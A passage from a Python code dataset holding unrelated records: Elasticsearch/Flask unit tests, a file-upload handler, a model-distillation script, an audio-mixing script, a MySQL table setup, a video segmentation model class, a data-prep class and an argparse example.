elasticsearch import Elasticsearch\r\nimport random\r\nfrom flask import Flask, render_template, request, flash, session, url_for, redirect\r\nfrom es_functions_list import *\r\nfrom es_app import app\r\n\r\ndef create_random_index(num):\r\n index_list = []\r\n for n in range(num): \r\n is_duplicate = True\r\n while is_duplicate:\r\n index_to_create = '';\r\n for i in range(10):\r\n index_to_create = 
index_to_create+ chr(random.randint(97, 122))\r\n if not (index_to_create in index_list):\r\n index_list.append(index_to_create)\r\n is_duplicate = False\r\n return index_list\r\n\r\n\r\n\r\nclass TestCase(unittest.TestCase):\r\n\r\n def setUp(self):\r\n app.config['TESTING'] = True\r\n self.app = app.test_client()\r\n \r\n def tearDown(self):\r\n pass\r\n\r\n def test_login_page(self):\r\n print('test login page')\r\n response = self.app.get('/', follow_redirects=True)\r\n self.assertEqual(response.status_code, 200)\r\n\r\n ##\r\n def test_updatebooking_get(self):\r\n response = self.app.get('/create', follow_redirects=True)\r\n self.assertEqual(response.status_code,200)\r\n ##\r\n\r\n\r\n def test_no_duplicated_index_created(self):\r\n ## test no duplicated index will be created \r\n index_to_create = create_random_index(1)[0]\r\n #first create if OK\r\n # second create is not OK \r\n self.assertTrue(create_index(es,index_to_create)['acknowledged'])\r\n # status 400 = index exits\r\n self.assertEqual(create_index(es,index_to_create)['status'],400)\r\n es.indices.delete(index=index_to_create, ignore=[400, 404])\r\n\r\n\r\n def test_load_data(self):\r\n ## test if data is returned in the correct format\r\n fids = [\"6cafe024c7e9f79dcb654fdc34b2577a\",\"cb404b5abaff0e2c302790c3d698d53a\",\"dc186f2d44cf7389606ed1da176aa854\"]\r\n locations =[\"/var/www/data/example.txt\", \"/var/www/data/downloads/test.txt\", \"/var/www/data/huge_file.mp4\"]\r\n location_dict =[{\"fid\": fids[0], \"location_on_disk\": locations[0]}, \\\r\n {\"fid\": fids[1],\"location_on_disk\": locations[1]},\\\r\n {\"fid\": fids[2],\"location_on_disk\":locations[2]}]\r\n self.assertEqual(load_data(fids, locations), location_dict)\r\n\r\n def test_new_created_index(self):\r\n ## test new created indices are included in thev list of all index\r\n new_index_list = create_random_index(5)\r\n existing_index_list = get_index_list(es)\r\n #print(existing_index_list)\r\n is_in_list = False\r\n for index in new_index_list:\r\n if self.assertNotIn(index, existing_index_list):\r\n is_in_list = True\r\n break\r\n \r\n if not is_in_list:\r\n for index in new_index_list:\r\n create_index(es,index)\r\n new_existing_index_list = get_index_list(es)\r\n #print(new_existing_index_list)\r\n for index in new_index_list:\r\n self.assertIn(index, new_existing_index_list)\r\n es.indices.delete(index=index, ignore=[400, 404])\r\n\r\n def test_no_document_in_index(self):\r\n ## test new created index has no document \r\n index_to_create = create_random_index(1)[0]\r\n existing_index_list = get_index_list(es)\r\n if not index_to_create in existing_index_list:\r\n create_index(es,index_to_create)\r\n msg, d_list, l_list = query_all(es, index_to_create)\r\n self.assertEqual(msg, 'Selected index '+ index_to_create + ' has no ' + ' documents.')\r\n self.assertEqual(d_list, [\"No Document in Selected Index\"])\r\n es.indices.delete(index=index_to_create, ignore=[400, 404])\r\n\r\n def test_document_in_index(self):\r\n ## test new created index has no document \r\n index_to_create = create_random_index(1)[0]\r\n existing_index_list = get_index_list(es)\r\n fids = [\"6cafe024c7e9f79dcb654fdc34b2577a\",\"cb404b5abaff0e2c302790c3d698d53a\",\"dc186f2d44cf7389606ed1da176aa854\"]\r\n locations =[\"/var/www/data/example.txt\", \"/var/www/data/downloads/test.txt\", \"/var/www/data/huge_file.mp4\"]\r\n if not index_to_create in existing_index_list:\r\n create_index(es,index_to_create)\r\n data = load_data(fids, locations)\r\n create_data(es, 
+{"seq_id":"299874476","text":"import datetime\nimport os\n\nclass Account:\n    def account_load(self):\n        path_account = 'Data\\\\account.txt'\n        path_log = 'Data\\\\log.txt'\n        try:\n            if os.path.exists(path_account):\n                pass\n            else:\n                print(\"No account file found; creating a new one.\")\n                accountfile = open(path_account, 'w')\n                accountfile.writelines(input(\"Enter your ID: \"))\n                accountfile.writelines(\"\\n\")\n                accountfile.writelines(input(\"Enter your PW: \"))\n                accountfile.close()\n            file = open(path_account, 'r')\n            reader = file.readlines()\n            account_list = []\n            for data in reader:\n                account_list.append(data.replace('\\n', ''))\n            return account_list\n        except Exception as error:\n            # str(error) is required here: concatenating str and an Exception raises TypeError\n            logfile = open(path_log, 'a')\n            print(str(datetime.datetime.now()) + \": \" + str(error))\n            logfile.writelines(str(datetime.datetime.now()) + \": \" + str(error) + \"\\n\")\n            logfile.close()\n\nif __name__ == \"__main__\":\n    acc = Account()\n    acc.account_load()","sub_path":"namdo_crowler/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"271544449","text":"import copy\nimport os.path\nimport datetime\n\nimport validators\n\nfrom . import base\nfrom . import util\nfrom . import files\nfrom . import rules\nfrom . import config\nfrom .dao import reaperutil, APIStorageException\nfrom . import validators\nfrom . 
import tempdir as tempfile\n\nlog = config.log\n\nclass Upload(base.RequestHandler):\n\n def reaper(self):\n \"\"\"Receive a sortable reaper upload.\"\"\"\n if not self.superuser_request:\n self.abort(402, 'uploads must be from an authorized drone')\n with tempfile.TemporaryDirectory(prefix='.tmp', dir=config.get_item('persistent', 'data_path')) as tempdir_path:\n try:\n file_store = files.FileStore(self.request, tempdir_path)\n except files.FileStoreException as e:\n self.abort(400, str(e))\n now = datetime.datetime.utcnow()\n fileinfo = dict(\n name=file_store.filename,\n created=now,\n modified=now,\n size=file_store.size,\n hash=file_store.hash,\n tags=file_store.tags,\n metadata=file_store.metadata\n )\n container = reaperutil.create_container_hierarchy(file_store.metadata)\n f = container.find(file_store.filename)\n target_path = os.path.join(config.get_item('persistent', 'data_path'), util.path_from_hash(fileinfo['hash']))\n if not f:\n file_store.move_file(target_path)\n container.add_file(fileinfo)\n rules.create_jobs(config.db, container.acquisition, 'acquisition', fileinfo)\n elif not file_store.identical(util.path_from_hash(fileinfo['hash']), f['hash']):\n file_store.move_file(target_path)\n container.update_file(fileinfo)\n rules.create_jobs(config.db, container.acquisition, 'acquisition', fileinfo)\n throughput = file_store.size / file_store.duration.total_seconds()\n log.info('Received %s [%s, %s/s] from %s' % (file_store.filename, util.hrsize(file_store.size), util.hrsize(throughput), self.request.client_addr))\n\n def engine(self):\n \"\"\"\n URL format: api/engine?level=&id=\n\n It expects a multipart/form-data request with a \"metadata\" field (json valid against api/schemas/input/enginemetadata)\n and 0 or more file fields with a non null filename property (filename is null for the \"metadata\").\n \"\"\"\n level = self.get_param('level')\n if level is None:\n self.abort(404, 'container level is required')\n if level != 'acquisition':\n self.abort(404, 'engine uploads are supported only at the acquisition level')\n acquisition_id = self.get_param('id')\n if not acquisition_id:\n self.abort(404, 'container id is required')\n else:\n acquisition_id = util.ObjectId(acquisition_id)\n if not self.superuser_request:\n self.abort(402, 'uploads must be from an authorized drone')\n with tempfile.TemporaryDirectory(prefix='.tmp', dir=config.get_item('persistent', 'data_path')) as tempdir_path:\n try:\n file_store = files.MultiFileStore(self.request, tempdir_path)\n except files.FileStoreException as e:\n self.abort(400, str(e))\n if not file_store.metadata:\n self.abort(400, 'metadata is missing')\n metadata_validator = validators.payload_from_schema_file(self, 'enginemetadata.json')\n metadata_validator(file_store.metadata, 'POST')\n file_infos = file_store.metadata['acquisition'].pop('files', [])\n now = datetime.datetime.utcnow()\n try:\n acquisition_obj = reaperutil.update_container_hierarchy(file_store.metadata, acquisition_id, level)\n except APIStorageException as e:\n self.abort(400, e.message)\n # move the files before updating the database\n for name, fileinfo in file_store.files.items():\n path = fileinfo['path']\n target_path = os.path.join(config.get_item('persistent', 'data_path'), util.path_from_hash(fileinfo['hash']))\n files.move_file(path, target_path)\n # merge infos from the actual file and from the metadata\n merged_infos = self._merge_fileinfos(file_store.files, file_infos)\n # update the fileinfo in mongo if a file already exists\n for f in 
acquisition_obj['files']:\n fileinfo = merged_infos.get(f['name'])\n if fileinfo:\n fileinfo.pop('path', None)\n fileinfo['modified'] = now\n acquisition_obj = reaperutil.update_fileinfo('acquisitions', acquisition_obj['_id'], fileinfo)\n fileinfo['existing'] = True\n # create the missing fileinfo in mongo\n for name, fileinfo in merged_infos.items():\n # if the file exists we don't need to create it\n # skip update fileinfo for files that doesn't have a path\n if not fileinfo.get('existing') and fileinfo.get('path'):\n del fileinfo['path']\n fileinfo['created'] = now\n fileinfo['modified'] = now\n acquisition_obj = reaperutil.add_fileinfo('acquisitions', acquisition_obj['_id'], fileinfo)\n\n for f in acquisition_obj['files']:\n if f['name'] in file_store.files:\n file_ = {\n 'name': f['name'],\n 'hash': f['hash'],\n 'type': f.get('type'),\n 'measurements': f.get('measurements', [])\n }\n rules.create_jobs(config.db, acquisition_obj, 'acquisition', file_)\n return [{'name': k, 'hash': v['hash'], 'size': v['size']} for k, v in merged_infos.items()]\n\n def _merge_fileinfos(self, hard_infos, infos):\n \"\"\"it takes a dictionary of \"hard_infos\" (file size, hash)\n merging them with infos derived from a list of infos on the same or on other files\n \"\"\"\n new_infos = copy.deepcopy(hard_infos)\n for info in infos:\n new_infos[info['name']] = new_infos.get(info['name'], {})\n new_infos[info['name']].update(info)\n return new_infos\n","sub_path":"api/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372192109","text":"import os\nimport sys\n\nfrom scipy.stats import pearsonr, spearmanr\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.optim import Adadelta, Adam\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .args import read_args\nfrom dbert.distill.data import find_dataset, set_seed, replace_embeds, list_field_mappings\nimport dbert.distill.model as mod\n\n\ndef evaluate(model, ds_iter, criterion, export_eval_labels=False):\n ds_iter.init_epoch()\n model.eval()\n acc = 0\n n = 0\n loss = 0\n gts = []\n preds = []\n for batch in tqdm(ds_iter):\n scores = model(batch.sentence1, batch.sentence2)\n # loss += criterion(scores, batch.is_duplicate).item()\n # labels_prob = F.softmax(scores, dim=1)[:,0]\n # labels = scores.max(1)[1]\n # labels_prob = labels\n # acc += ((labels == batch.is_duplicate).float().sum()).item()\n acc += scores.mean().item()\n try:\n gts.extend(batch.score.view(-1).tolist())\n preds.extend(scores.view(-1).tolist())\n except:\n continue\n n += scores.size(0)\n if export_eval_labels:\n print(\"\\n\".join(list(map(str, scores.view(-1).cpu().tolist()))))\n if len(gts) == 0:\n return 0, 0\n pr = pearsonr(preds, gts)[0]\n sr = spearmanr(preds, gts)[0]\n return pr, sr\n\n\ndef main():\n args = read_args(default_config=\"confs/kim_cnn_sst2.json\")\n args.epochs = 1000\n set_seed(args.seed)\n try:\n os.makedirs(args.workspace)\n except:\n pass\n torch.cuda.deterministic = True\n\n dataset_cls = find_dataset(args.dataset_name)\n training_iter, dev_iter, test_iter = dataset_cls.iters(args.dataset_path, args.vectors_file, args.vectors_dir,\n batch_size=args.batch_size, device=args.device, train=args.train_file, dev=args.dev_file, test=args.test_file)\n\n args.dataset = training_iter.dataset\n args.words_num = len(training_iter.dataset.TEXT_FIELD.vocab)\n model = 
mod.SiameseRNNModel(args).to(args.device)\n ckpt_attrs = mod.load_checkpoint(model, args.workspace,\n best=args.load_best_checkpoint) if args.load_last_checkpoint or args.load_best_checkpoint else {}\n sd = torch.load('nw-qqp/best_model.pt')['state_dict']\n for k in list(sd.keys()):\n if any(x in k for x in ('embed', 'fc2')): del sd[k]\n # model.load_state_dict(sd, strict=False)\n offset = ckpt_attrs.get(\"epoch_idx\", -1) + 1\n args.epochs -= offset\n\n embs, field_src_vocab = torch.load('nw-qqp/qqp-embs.pt')\n field_mappings = list_field_mappings(dataset_cls.TEXT_FIELD, field_src_vocab)\n # replace_embeds(model.non_static_embed, embs, field_mappings)\n\n training_pbar = tqdm(total=len(training_iter), position=2)\n training_pbar.set_description(\"Training\")\n dev_pbar = tqdm(total=args.epochs, position=1)\n dev_pbar.set_description(\"Dev\")\n\n criterion = nn.CrossEntropyLoss()\n kd_criterion = nn.MSELoss()# KLDivLoss(reduction=\"batchmean\")\n params = list(map(lambda x: x[1], filter(lambda x: x[1].requires_grad and 'fc2' in x[0], model.named_parameters())))\n optimizer = Adadelta(params, lr=args.lr, rho=0.95)\n #optimizer = Adam(params, lr=args.lr)\n increment_fn = mod.make_checkpoint_incrementer(model, args.workspace, save_last=True,\n best_loss=ckpt_attrs.get(\"best_dev_loss\", 10000))\n non_embedding_params = model.non_embedding_params()\n # torch.save((model.non_static_embed, dataset_cls.TEXT_FIELD.vocab), 'sts-embs.pt')\n # return\n\n if args.use_data_parallel:\n model = nn.DataParallel(model)\n if args.eval_test_only:\n test_acc, _ = evaluate(model, test_iter, criterion, export_eval_labels=args.export_eval_labels)\n print(test_acc)\n return\n if args.epochs == 0:\n print(\"No epochs left from loaded model.\", file=sys.stderr)\n return\n for epoch_idx in tqdm(range(args.epochs), position=0):\n training_iter.init_epoch()\n model.train()\n training_pbar.n = 0\n training_pbar.refresh()\n for batch in training_iter:\n training_pbar.update(1)\n optimizer.zero_grad()\n # logits = model(batch.question1, batch.question2)\n logits = model(batch.sentence1, batch.sentence2)\n # kd_logits = torch.stack((batch.logits_0, batch.logits_1), 1)\n kd_logits = torch.stack((batch.score,), 1)\n #kd = args.distill_lambda * kd_criterion(F.log_softmax(logits / args.distill_temperature, 1),\n # F.softmax(kd_logits / args.distill_temperature, 1))\n kd = args.distill_lambda * kd_criterion(logits, kd_logits)\n # loss = args.ce_lambda * criterion(logits, batch.is_duplicate) + kd\n loss = kd\n loss.backward()\n clip_grad_norm_(non_embedding_params, args.clip_grad)\n optimizer.step()\n # acc = ((logits.max(1)[1] == batch.is_duplicate).float().sum() / batch.is_duplicate.size(0)).item()\n training_pbar.set_postfix(loss=f\"{loss.item():.4}\")\n\n model.eval()\n dev_pr, dev_sr = evaluate(model, dev_iter, criterion)\n dev_pbar.update(1)\n dev_pbar.set_postfix(pearsonr=f\"{dev_pr:.4}\")\n is_best_dev = increment_fn(-dev_pr, dev_sr=dev_sr, dev_pr=dev_pr, epoch_idx=epoch_idx + offset)\n\n if is_best_dev:\n dev_pbar.set_postfix(pearsonr=f\"{dev_pr:.4} (best loss)\")\n # test_acc, _ = evaluate(model, test_iter, criterion, export_eval_labels=args.export_eval_labels)\n training_pbar.close()\n dev_pbar.close()\n # print(f\"Test accuracy of the best model: {test_acc:.4f}\", file=sys.stderr)\n # print(test_acc)\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"dbert/distill/run/distill_siamese_rnn_mse.py","file_name":"distill_siamese_rnn_mse.py","file_ext":"py","file_size_in_byte":5710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"551111426","text":"import argparse\nimport json\nfrom tqdm import tqdm\nimport soundfile as sf\nimport numpy as np\nimport os\nimport pyloudnorm\nfrom scipy.signal import resample_poly\nimport pandas as pd\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--json\", default=\"/home/fei/SparseLibriMix/metadata/sparse_5_0.2/metadata.json\") # choose n_speakers and overlap_ratio\nparser.add_argument(\"--librispeech_dir\", default=\"/storageNVME/fei/data/speech/Librimix/LibriSpeech/test-clean/\")\nparser.add_argument('--out_dir', help='output data dir of mixture', default=\"/storageNVME/fei/data/speech/Librimix/SparseLibriMix/wav8000/sparse_5_0.2\")\nparser.add_argument(\"--noise_dir\", type=str, default=\"/storageNVME/fei/data/speech/Librimix/wham_noise/tt\")\nparser.add_argument('--rate', type=int, default=8000,\n help='sampling rate')\n\n# parser.add_argument(\"json\")\n# parser.add_argument(\"librispeech_dir\")\n# parser.add_argument('out_dir',help='output data dir of mixture')\n# parser.add_argument(\"--noise_dir\", type=str, default=\"\")\n# parser.add_argument('--rate', type=int, default=16000,\n# help='sampling rate')\n\ndef main(args):\n if not args.noise_dir:\n print(\"Generating only clean version\")\n\n with open(args.json, \"r\") as f:\n total_meta = json.load(f)\n\n # Dictionary that will contain all metadata\n md_dic = {}\n # Create Dataframes\n dir_name = args.json.split('/')[-2]\n n_src = int(dir_name.split('_')[1])\n print(n_src, dir_name)\n md_dic[f'mixture_{dir_name}_mix_clean'] = create_empty_mixture_md(n_src, 'mix_clean')\n if args.noise_dir:\n md_dic[f'mixture_{dir_name}_mix_noisy'] = create_empty_mixture_md(n_src, 'mix_noisy')\n\n for mix in tqdm(total_meta):\n # filename = mix[\"mixture_name\"]\n sources_list = [x for x in mix.keys() if x != \"mixture_name\"]\n\n sources = {}\n utt_id_list = ['' for i in range(n_src)]\n maxlength = 0\n for source in sources_list:\n # read file optional resample it\n source_utts = []\n for utt in mix[source]:\n if utt[\"source\"] != \"noise\": # speech file\n utt[\"file\"] = os.path.join(args.librispeech_dir, utt[\"file\"])\n else:\n if args.noise_dir:\n utt[\"file\"] = os.path.join(args.noise_dir, utt[\"file\"])\n else:\n continue\n\n utt_fs = sf.SoundFile(utt[\"file\"]).samplerate\n audio, fs = sf.read(utt[\"file\"], start=int(utt[\"orig_start\"]*utt_fs),\n stop=int(utt[\"orig_stop\"]*utt_fs))\n\n #assert len(audio.shape) == 1, \"we currently not support multichannel\"\n if len(audio.shape) > 1:\n audio = audio[:, utt[\"channel\"]] #TODO\n audio = audio - np.mean(audio) # zero mean cos librispeech is messed up sometimes\n audio = resample_and_norm(audio, fs, args.rate, utt[\"lvl\"])\n audio = np.pad(audio, (int(utt[\"start\"]*args.rate), 0), \"constant\") # pad the beginning\n source_utts.append(audio)\n maxlength = max(len(audio), maxlength)\n if source != \"noise\":\n utt_id = utt[\"utt_id\"]\n sources[source] = source_utts\n if source != \"noise\":\n utt_id_list[int(source[1:])-1] = utt_id\n\n filename = '_'.join(utt_id_list)\n\n # pad everything to same length\n for s in sources.keys():\n for i in range(len(sources[s])):\n tmp = sources[s][i]\n sources[s][i] = np.pad(tmp, (0, maxlength-len(tmp)), 'constant')\n\n # mix n sum\n tot_mixture = None\n abs_source_path_list = 
['' for i in range(n_src)]\n for indx, s in enumerate(sources.keys()):\n if s == \"noise\":\n continue\n source_mix = np.sum(sources[s], 0)\n os.makedirs(os.path.join(args.out_dir, s), exist_ok=True)\n sf.write(os.path.join(args.out_dir, s, filename + \".wav\"), source_mix, args.rate)\n if indx == 0:\n tot_mixture = source_mix\n else:\n tot_mixture += source_mix\n abs_source_path_list[int(s[1:])-1] = os.path.join(args.out_dir, s, filename + \".wav\")\n\n os.makedirs(os.path.join(args.out_dir, \"mix_clean\"), exist_ok=True)\n sf.write(os.path.join(args.out_dir, \"mix_clean\", filename + \".wav\"), tot_mixture, args.rate)\n\n add_to_mixture_metadata(md_dic[f'mixture_{dir_name}_mix_clean'], filename,\n os.path.join(args.out_dir, \"mix_clean\", filename + \".wav\"),\n abs_source_path_list,\n maxlength, \"mix_clean\")\n\n if args.noise_dir:\n s = \"noise\"\n source_mix = np.sum(sources[s], 0)\n os.makedirs(os.path.join(args.out_dir, s), exist_ok=True)\n sf.write(os.path.join(args.out_dir, s, filename + \".wav\"), source_mix, args.rate)\n tot_mixture += source_mix\n os.makedirs(os.path.join(args.out_dir, \"mix_noisy\"), exist_ok=True)\n sf.write(os.path.join(args.out_dir, \"mix_noisy\", filename + \".wav\"), tot_mixture, args.rate)\n\n # Save the metadata files\n metadata_path = os.path.join('/'.join(args.out_dir.split('/')[:-1]), 'metadata')\n os.makedirs(metadata_path, exist_ok=True)\n for md_df in md_dic:\n # Save the metadata in out_dir ./data/wavxk/mode/subset\n save_path_mixture = os.path.join(metadata_path, md_df + '.csv')\n md_dic[md_df].to_csv(save_path_mixture, index=False)\n\n\ndef resample_and_norm(signal, orig, target, lvl):\n\n if orig != target:\n signal = resample_poly(signal, target, orig)\n\n #fx = (AudioEffectsChain().custom(\"norm {}\".format(lvl)))\n #signal = fx(signal)\n\n meter = pyloudnorm.Meter(target, block_size=0.1)\n loudness = meter.integrated_loudness(signal)\n signal = pyloudnorm.normalize.loudness(signal, loudness, lvl)\n\n return signal\n\n\ndef create_empty_mixture_md(n_src, subdir):\n \"\"\" Create the mixture dataframe\"\"\"\n mixture_dataframe = pd.DataFrame()\n mixture_dataframe['mixture_ID'] = {}\n mixture_dataframe['mixture_path'] = {}\n if subdir == 'mix_clean':\n for i in range(n_src):\n mixture_dataframe[f\"source_{i + 1}_path\"] = {}\n elif subdir == 'mix_noisy':\n for i in range(n_src):\n mixture_dataframe[f\"source_{i + 1}_path\"] = {}\n mixture_dataframe[f\"noise_path\"] = {}\n elif subdir == 'mix_single':\n mixture_dataframe[\"source_1_path\"] = {}\n mixture_dataframe[f\"noise_path\"] = {}\n mixture_dataframe['length'] = {}\n return mixture_dataframe\n\n\ndef add_to_mixture_metadata(mix_df, mix_id, abs_mix_path, abs_sources_path,\n length, subdir, abs_noise_path=None):\n \"\"\" Add a new line to mixture_df \"\"\"\n sources_path = abs_sources_path\n if subdir == 'mix_clean':\n noise_path = []\n elif subdir == 'mix_single':\n sources_path = [abs_sources_path[0]]\n if abs_noise_path is not None:\n row_mixture = [mix_id, abs_mix_path] + sources_path + [abs_noise_path] + [length]\n else:\n row_mixture = [mix_id, abs_mix_path] + sources_path + [length]\n mix_df.loc[len(mix_df)] = row_mixture\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n main(args)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"scripts/make_mixtures.py","file_name":"make_mixtures.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"242293189","text":"import 
bmi_Calculator\nimport pymysql\n\n\ndef db_Connection():\n try:\n # Database credential initialization\n endpoint = \"localhost\"\n username = \"root\"\n password = \"admin\"\n database_name = \"bmicalc\"\n\n # Connection to database\n connection = pymysql.connect(\n host=endpoint, user=username, passwd=password, db=database_name)\n cursor = connection.cursor()\n return cursor, connection\n except Exception as Identifier:\n print(Identifier)\n\n\ndef createtable():\n resp = {}\n try:\n\n cursor, connection = db_Connection()\n sqlCreateTable = \"\"\"CREATE TABLE IF NOT EXISTS bmi_data (\n BMI_DATA_ID int NOT NULL AUTO_INCREMENT,\n PERSON_GENDER varchar(50) NOT NULL,\n PERSON_HEIGHT varchar(50) NOT NULL,\n PERSON_WEIGHT varchar(50) NOT NULL,\n PERSON_BMI varchar(50) NOT NULL,\n PERSON_BMI_CATEGORY varchar(50) NOT NULL,\n PERSON_HEALTH_RISK varchar(50) NOT NULL,\n BMI_DATA_TS timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n PRIMARY KEY (BMI_DATA_ID)\n );\n \"\"\"\n cursor.execute(sqlCreateTable)\n connection.commit()\n resp[\"Msg\"] = \"Table Created Successfully\"\n return resp\n except pymysql.Error as sqlerror:\n resp[\"Msg\"] = \"Error in table Creation\"\n return resp\n\n\nif __name__ == \"__main__\":\n\n result = createtable()\n print(result)\n","sub_path":"create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289246164","text":"# -*- coding: utf-8 -*\nimport torch\n\nfrom loguru import logger\nfrom videoanalyst.model.module_base import ModuleBase\nfrom videoanalyst.model.task_model.taskmodel_base import (TRACK_TASKMODELS,\n VOS_TASKMODELS)\nfrom videoanalyst.utils import md5sum\n\ntorch.set_printoptions(precision=8)\n\n\n@VOS_TASKMODELS.register\nclass SatVOS(ModuleBase):\n r\"\"\"\n State-Aware Tracker model for VOS\n\n Hyper-Parameters\n ----------------\n pretrain_model_path: string\n path to parameter to be loaded into module\n \"\"\"\n\n default_hyper_params = dict(pretrain_model_path=\"\", )\n\n def __init__(self, GML_extractor, joint_encoder, decoder, loss):\n super(SatVOS, self).__init__()\n self.GML_extractor = GML_extractor\n self.joint_encoder = joint_encoder\n self.decoder = decoder\n # loss\n self.loss = loss\n\n def forward(self, *args, phase=\"train\"):\n r\"\"\"\n Perform VOS process for different phases (e.g. 
train / global_feature / segment)\n\n Arguments\n ---------\n filterd_image: torch.Tensor\n filtered image patch for global modeling loop\n\n saliency_image: torch.Tensor\n saliency image for saliency encoder\n corr_feature: torch.Tensor\n correlated feature produced by siamese encoder\n global_feature: torch.Tensor\n global feature produced by global modeling loop\n\n Returns\n -------\n f_g: torch.Tensor\n global feature extracted from filtered image\n pred_mask: torch.Tensor\n predicted mask after sigmoid for the patch of saliency image\n\n \"\"\"\n # phase: train\n if phase == 'train':\n pass\n\n # phase: feature\n elif phase == 'global_feature':\n filterd_image, = args\n f_g = self.GML_extractor(filterd_image)\n out_list = [f_g]\n return out_list\n\n elif phase == 'segment':\n saliency_image, corr_feature, global_feature = args\n enc_features = self.joint_encoder(saliency_image, corr_feature)\n decoder_features = [global_feature] + enc_features\n\n outputs = self.decoder(decoder_features)\n pred_mask = outputs[0]\n out_list = [pred_mask]\n return out_list\n\n else:\n raise ValueError(\"Phase non-implemented.\")\n\n def update_params(self):\n r\"\"\"\n Load model parameters\n \"\"\"\n if self._hyper_params[\"pretrain_model_path\"] != \"\":\n model_path = self._hyper_params[\"pretrain_model_path\"]\n state_dict = torch.load(model_path,\n map_location=torch.device(\"cpu\"))\n if \"model_state_dict\" in state_dict:\n state_dict = state_dict[\"model_state_dict\"]\n try:\n self.load_state_dict(state_dict, strict=True)\n except:\n self.load_state_dict(state_dict, strict=False)\n logger.info(\"Pretrained weights loaded from {}\".format(model_path))\n logger.info(\"Check md5sum of Pretrained weights: %s\" %\n md5sum(model_path))\n\n def set_device(self, dev):\n if not isinstance(dev, torch.device):\n dev = torch.device(dev)\n self.to(dev)\n if self.loss is not None:\n for loss_name in self.loss:\n self.loss[loss_name].to(dev)\n","sub_path":"videoanalyst/model/task_model/taskmodel_impl/sat_vos.py","file_name":"sat_vos.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94204907","text":"import data_cleansing as dc\nimport store_db\nimport numpy as np\nfrom datetime import datetime\n\n\nclass Applications:\n def __init__(self):\n self.filepath = './data/applications.csv'\n self.date = datetime(year=2019, month=3, day=12)\n self.dc = dc.DataPrep(self.filepath)\n self.df = self.load_data_frame()\n self.features = ['person_id', 'id', 'job_ad_id', 'submitted_at']\n\n def load_data_frame(self):\n if not self.dc.check_clean_file():\n self.prepare_clean_ds(self.dc)\n self.dc = dc.DataPrep(self.filepath)\n\n # Load the clean DS\n df = self.dc.df\n\n # Test the dataset for inconsistencies\n df = self.test_and_prep_df(df)\n\n return df.add_suffix('_appl')\n\n def prepare_clean_ds(self, dc):\n\n # Convert datetime columns to date format\n dc.convert_to_datetime('submitted_at')\n dc.convert_to_datetime('created_at')\n dc.df['submitted_at_wkd'] = dc.df['submitted_at'].dt.dayofweek\n dc.df['created_at_wkd'] = dc.df['created_at'].dt.dayofweek\n dc.df['application_time_days'] = (dc.df['submitted_at'] - dc.df['created_at']).dt.days\n dc.df['date_today'] = self.date\n dc.df['created_not_finished'] = np.where(((dc.df['date_today'] - dc.df['created_at'].dt.tz_localize(None)).dt.days == -1) & dc.df['submitted_at'].isnull(), -0.5, 0)\n dc.df['created_not_finished'] = dc.df['created_not_finished'].fillna(0)\n dc.df = 
dc.df.drop('date_today', axis=1)\n\n        sqlite = store_db.SQLite()\n        dc.df.to_sql('applications', con=sqlite.create_connection(), if_exists='replace', index=False)\n\n        dc.generate_clean_csv()\n\n    def test_and_prep_df(self, df):\n\n        df = dc.DataPrep.remove_dup_rows(df, self.dc.name)\n\n        # Test if the user applied to the same job offer more than once. The data does not make clear whether editing an application counts as a new application or updates the existing row.\n        # As stated, we are removing the 'duplicate lines', if any.\n        # Consider removing this line, as the conditions under which the user re-applied might have changed (new skills).\n        clean_df = df.dropna(subset=['submitted_at'])\n\n        if clean_df.groupby(['person_id', 'job_ad_id', 'id'])['job_ad_id'].count().max() > 1:\n            # drop_duplicates returns a copy, so the result must be assigned back\n            df = df.drop_duplicates(subset=['person_id', 'job_ad_id'])\n            print(\"User applied more than once to the job offer\")\n\n        if df.groupby(['person_id', 'id'])['job_ad_id'].count().max() > 1:\n            print(\"User can have multiple IDs or User Ids\")\n\n        return df\n","sub_path":"applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"403009152","text":"import argparse\n\n# Create the parser instance\nparser = argparse.ArgumentParser(description='Example command')\n\n# Define the -s option, which takes a string\nparser.add_argument('-s', '--string', type=str, help='string to display', required=True)\n\n# Define the -n option, which takes an integer\nparser.add_argument('-n','--num',type=int, help='number of times to repeatedly display the string', default=2 )\n\n# Parse the arguments and store the resulting values in a variable\nargs = parser.parse_args()\n\n# Use the values obtained by parsing\nprint(args.string * args.num) \n\n","sub_path":"scraping/selenium_kisyou_kako/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
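The repeat.py record above covers the basic argparse pattern; the natural next step is input validation, where a custom type callable and a choices list let argparse reject bad values with a clean usage error instead of crashing later. An illustrative sketch, not part of the original script (the option names here are invented for the example):

import argparse

def positive_int(value):
    # argparse converts ArgumentTypeError into a friendly usage message
    n = int(value)
    if n <= 0:
        raise argparse.ArgumentTypeError('expected a positive integer, got %r' % value)
    return n

parser = argparse.ArgumentParser(description='Example command with validation')
parser.add_argument('-s', '--string', required=True)
parser.add_argument('-n', '--num', type=positive_int, default=2)
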